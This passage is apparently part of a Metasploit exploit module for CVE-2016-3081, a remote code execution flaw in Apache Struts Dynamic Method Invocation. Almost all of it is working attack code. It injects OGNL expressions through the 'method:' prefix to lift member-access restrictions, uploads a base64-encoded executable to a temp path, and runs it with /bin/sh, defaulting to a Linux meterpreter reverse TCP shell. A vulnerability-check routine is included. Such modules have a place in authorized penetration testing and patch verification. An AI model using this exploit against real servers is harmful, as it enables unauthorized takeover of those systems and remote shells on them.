'Name' => 'Apache Struts Dynamic Method Invocation Remote Code Execution',
'Description' => %q{
This module exploits a remote command execution vulnerability in Apache Struts
version between 2.3.20 and 2.3.28 (except 2.3.20.2 and 2.3.24.2). Remote Code
Execution can be performed via method: prefix when Dynamic Method Invocation
is enabled.
},
'Author' => [ 'Nixawk' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2016-3081' ],
[ 'URL', 'https://www.seebug.org/vuldb/ssvid-91389' ]
],
'Platform' => %w{ linux },
'Privileged' => true,
'DefaultOptions' => {
'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp_uuid'
},
'Targets' =>
[
['Linux Universal',
{
'Arch' => ARCH_X86,
'Platform' => 'linux'
}
]
],
'DisclosureDate' => 'Apr 27 2016',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(8080),
OptString.new('TARGETURI', [ true, 'The path to a struts application action', '/blank-struts2/login.action']),
OptString.new('TMPPATH', [ false, 'Overwrite the temp path for the file upload. Needed if the home directory is not writable.', nil])
], self.class)
end
def print_status(msg='')
super("#{peer} - #{msg}")
end
def send_http_request(payload)
uri = normalize_uri(datastore['TARGETURI'])
res = send_request_cgi(
'uri' => "#{uri}#{payload}",
'method' => 'POST')
if res && res.code == 404
fail_with(Failure::BadConfig, 'Server returned HTTP 404, please double check TARGETURI')
end
res
end
def parameterize(params) # params is a hash
URI.escape(params.collect { |k, v| "#{k}=#{v}" }.join('&'))
end
def generate_rce_payload(code, params_hash)
payload = "?method:"
payload << Rex::Text.uri_encode("#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS")
payload << ","
payload << Rex::Text.uri_encode(code)
payload << ","
payload << Rex::Text.uri_encode("1?#xx:#request.toString")
payload << "&"
payload << parameterize(params_hash)
payload
end
def temp_path
@TMPPATH ||= lambda {
path = datastore['TMPPATH']
return nil unless path
unless path.end_with?('/')
path << '/'
end
return path
}.call
end
def upload_file(filename, content)
var_a = rand_text_alpha_lower(4)
var_b = rand_text_alpha_lower(4)
var_c = rand_text_alpha_lower(4)
var_d = rand_text_alpha_lower(4)
code = "##{var_a}=new sun.misc.BASE64Decoder(),"
code << "##{var_b}=new java.io.FileOutputStream(new java.lang.String(##{var_a}.decodeBuffer(#parameters.#{var_c}[0]))),"
code << "##{var_b}.write(##{var_a}.decodeBuffer(#parameters.#{var_d}[0])),"
code << "##{var_b}.close()"
params_hash = { var_c => filename, var_d => content }
payload = generate_rce_payload(code, params_hash)
send_http_request(payload)
end
def execute_command(cmd)
var_a = rand_text_alpha_lower(4)
var_b = rand_text_alpha_lower(4)
var_c = rand_text_alpha_lower(4)
var_d = rand_text_alpha_lower(4)
var_e = rand_text_alpha_lower(4)
var_f = rand_text_alpha_lower(4)
code = "##{var_a}=@java.lang.Runtime@getRuntime().exec(#parameters.#{var_f}[0]).getInputStream(),"
code << "##{var_b}=new java.io.InputStreamReader(##{var_a}),"
code << "##{var_c}=new java.io.BufferedReader(##{var_b}),"
code << "##{var_d}=new char[1024],"
code << "##{var_c}.read(##{var_d}),"
code << "##{var_e}=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),"
code << "##{var_e}.println(##{var_d}),"
code << "##{var_e}.close()"
cmd.tr!(' ', '+') if cmd && cmd.include?(' ')
params_hash = { var_f => cmd }
payload = generate_rce_payload(code, params_hash)
send_http_request(payload)
end
def linux_stager
payload_exe = rand_text_alphanumeric(4 + rand(4))
path = temp_path || '/tmp/'
payload_exe = "#{path}#{payload_exe}"
b64_filename = Rex::Text.encode_base64(payload_exe)
b64_content = Rex::Text.encode_base64(generate_payload_exe)
print_status("Uploading exploit to #{payload_exe}")
upload_file(b64_filename, b64_content)
print_status("Attempting to execute the payload...")
execute_command("chmod 700 #{payload_exe}")
execute_command("/bin/sh -c #{payload_exe}")
end
def exploit
linux_stager
end
def check
var_a = rand_text_alpha_lower(4)
var_b = rand_text_alpha_lower(4)
addend_one = rand_text_numeric(rand(3) + 1).to_i
addend_two = rand_text_numeric(rand(3) + 1).to_i
sum = addend_one + addend_two
flag = Rex::Text.rand_text_alpha(5)
code = "##{var_a}=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),"
code << "##{var_a}.print(#parameters.#{var_b}[0]),"
code << "##{var_a}.print(new java.lang.Integer(#{addend_one}+#{addend_two})),"
code << "##{var_a}.print(#parameters.#{var_b}[0]),"
code << "##{var_a}.close()"
params_hash = { var_b => flag }
payload = generate_rce_payload(code, params_hash)
begin
resp = send_http_request(payload)
rescue Msf::Exploit::Failed
return Exploit::CheckCode::Unknown
end
if resp && resp.code == 200 && resp.body.include?("#{flag}#{sum}#{flag}")
Exploit::CheckCode::Vulnerable
else
Exploit::CheckCode::Safe
end
end
end